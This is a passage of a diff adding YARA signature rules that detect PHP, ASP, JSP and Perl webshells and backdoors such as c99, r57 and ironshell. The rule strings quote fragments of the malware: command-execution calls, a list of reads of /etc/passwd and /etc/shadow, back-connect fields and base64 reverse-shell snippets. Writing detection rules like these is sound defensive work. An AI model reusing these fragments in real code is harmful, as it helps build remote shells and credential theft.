+		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+	condition:
+		1 of them
+}
+rule mysql_tool_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
+	strings:
+		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
+		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
+		$s4 = "<div align=\"center\">The backup process has now started<br "
+	condition:
+		1 of them
+}
+rule Zehir_4_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7f4e12e159360743ec016273c3b9108c"
+	strings:
+		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
+		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
+	condition:
+		1 of them
+}
+rule sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "330af9337ae51d0bac175ba7076d6299"
+	strings:
+		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
+		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
+	condition:
+		1 of them
+}
+rule phpbackdoor15_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0fdb401a49fc2e481e3dfd697078334b"
+	strings:
+		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
+		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
+		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
+	condition:
+		1 of them
+}
+rule phpjackal_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpjackal.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
+	strings:
+		$s3 = "$dl=$_REQUEST['downloaD'];"
+		$s4 = "else shelL(\"perl.exe $name $port\");"
+	condition:
+		1 of them
+}
+rule sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8334249cbb969f2d33d678fec2b680c5"
+	strings:
+		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
+		$s2 = "http://rst.void.ru"
+		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+	condition:
+		1 of them
+}
+rule cgi_python_py {
+	meta:
+		description = "Semi-Auto-generated  - file cgi-python.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0a15f473e2232b89dae1075e1afdac97"
+	strings:
+		$s0 = "a CGI by Fuzzyman"
+		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
+		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
+	condition:
+		1 of them
+}
+rule ru24_post_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5b334d494564393f419af745dc1eeec7"
+	strings:
+		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s4 = "Writed by DreAmeRz" fullword
+	condition:
+		1 of them
+}
+rule DTool_Pro_php {
+	meta:
+		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "366ad973a3f327dfbfb915b0faaea5a6"
+	strings:
+		$s0 = "r3v3ng4ns\\nDigite"
+		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
+		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
+	condition:
+		1 of them
+}
+rule telnetd_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnetd.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5f61136afd17eb025109304bd8d6d414"
+	strings:
+		$s0 = "0ldW0lf" fullword
+		$s1 = "However you are lucky :P"
+		$s2 = "I'm FuCKeD"
+		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
+		$s4 = "atrix@irc.brasnet.org"
+	condition:
+		1 of them
+}
+rule php_include_w_shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "4e913f159e33867be729631a7ca46850"
+	strings:
+		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
+		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
+	condition:
+		1 of them
+}
+rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {
+	meta:
+		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6163b30600f1e80d2bb5afaa753490b6"
+	strings:
+		$s0 = "Safe0ver" fullword
+		$s1 = "Script Gecisi Tamamlayamadi!"
+		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
+	condition:
+		1 of them
+}
+rule shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1a95f0163b6dea771da1694de13a3d8d"
+	strings:
+		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
+		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+	condition:
+		1 of them
+}
+rule telnet_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dee697481383052980c20c48de1598d1"
+	strings:
+		$s0 = "www.rohitab.com"
+		$s1 = "W A R N I N G: Private Server"
+		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
+		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
+	condition:
+		1 of them
+}
+rule ironshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file ironshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+	strings:
+		$s0 = "www.ironwarez.info"
+		$s1 = "$cookiename = \"wieeeee\";"
+		$s2 = "~ Shell I"
+		$s3 = "www.rootshell-team.info"
+		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
+	condition:
+		1 of them
+}
+rule backdoorfr_php {
+	meta:
+		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "91e4afc7444ed258640e85bcaf0fecfc"
+	strings:
+		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
+		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
+	condition:
+		1 of them
+}
+rule aspydrv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1c01f8a88baee39aa1cebec644bbcb99"
+		score = 60
+	strings:
+		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
+		$s1 = "password"
+		$s2 = "session(\"shagman\")="
+	condition:
+		2 of them
+}
+rule cmdjsp_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b815611cc39f17f05a73444d699341d4"
+	strings:
+		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s2 = "cmdjsp.jsp"
+		$s3 = "michaeldaw.org" fullword
+	condition:
+		2 of them
+}
+rule h4ntu_shell__powered_by_tsoi_ {
+	meta:
+		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+	strings:
+		$s0 = "h4ntu shell"
+		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+	condition:
+		1 of them
+}
+rule Ajan_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Ajan.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b6f468252407efc2318639da22b08af0"
+	strings:
+		$s1 = "c:\\downloaded.zip"
+		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+		$s3 = "http://www35.websamba.com/cybervurgun/"
+	condition:
+		1 of them
+}
+rule PHANTASMA_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "52779a27fa377ae404761a7ce76a5da7"
+	strings:
+		$s0 = ">[*] Safemode Mode Run</DIV>"
+		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
+		$s2 = "[*] Spawning Shell"
+		$s3 = "Cha0s"
+	condition:
+		2 of them
+}
+rule MySQL_Web_Interface_Version_0_8_php {
+	meta:
+		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+	strings:
+		$s0 = "SooMin Kim"
+		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
+		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
+		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
+	condition:
+		2 of them
+}
+rule simple_cmd_html {
+	meta:
+		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6381412df74dbf3bcd5a2b31522b544"
+	strings:
+		$s1 = "<title>G-Security Webshell</title>" fullword
+		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+	condition:
+		all of them
+}
+rule _1_c2007_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash1 = "d089e7168373a0634e1ac18c0ee00085"
+		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
+		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+	condition:
+		1 of them
+}
+rule _nst_php_php_img_php_php_nstview_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash2 = "4745d510fed4378e4b1730f56f25e569"
+	strings:
+		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
+		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
+		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
+	condition:
+		1 of them
+}
+rule _network_php_php_xinfo_php_php_nfm_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		hash1 = "2601b6fc1579f263d2f3960ce775df70"
+		hash2 = "401fbae5f10283051c39e640b77e4c26"
+	strings:
+		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
+		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
+		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
+	condition:
+		1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "8023394542cddf8aee5dec6072ed02b5"
+		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash5 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
+		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
+	condition:
+		1 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
+		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
+		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
+	condition:
+		2 of them
+}
+rule _r577_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash2 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
+		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		hash6 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
+		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
+		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
+		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
+		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
+	condition:
+		1 of them
+}
+rule _w_php_php_wacking_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s2 = "c99sh_sqlquery"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
+		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
+	condition:
+		1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
+		$s1 = ".$arrow.\"</b>\",in('text','"
+	condition:
+		2 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+	strings:
+		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
+		$s2 = "rst.void.ru"
+	condition:
+		3 of them
+}
+rule _r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "8023394542cddf8aee5dec6072ed02b5"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "echo ws(2).$lb.\" <a"
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
+		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
+	condition:
+		2 of them
+}
+rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "if(eregi(\"./shbd $por\",$scan))"
+		$s1 = "$_POST['backconnectip']"
+		$s2 = "$_POST['backcconnmsg']"
+	condition:
+		1 of them
+}
+rule _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "8023394542cddf8aee5dec6072ed02b5"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s1 = "if(rmdir($_POST['mk_name']))"
+		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
+		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
+	condition:
+		2 of them
+}
+rule _w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
+		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
+		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
+	condition:
+		1 of them
+}
+rule _webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php {
+	meta:
+		description = "Semi-Auto-generated  - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"
+		hash1 = "12911b73bc6a5d313b494102abcf5c57"
+		hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"
+	strings:
+		$s0 = "return $type . $owner . $group . $other;" fullword
+		$s1 = "$owner  = ($mode & 00400) ? 'r' : '-';" fullword
+	condition:
+		all of them
+}
+rule multiple_php_webshells {
+	meta:
+		description = "Semi-Auto-generated  - from files multiple_php_webshells"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "be0f67f3e995517d18859ed57b4b4389"
+		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash4 = "8023394542cddf8aee5dec6072ed02b5"
+		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash6 = "817671e1bdc85e04cc3440bbd9288800"
+		hash7 = "7101fe72421402029e2629f3aaed6de7"
+		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
+		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+	strings:
+		$s0 = "<b>Dumped! Dump has been writed to "
+		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
+		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php {
+	meta:
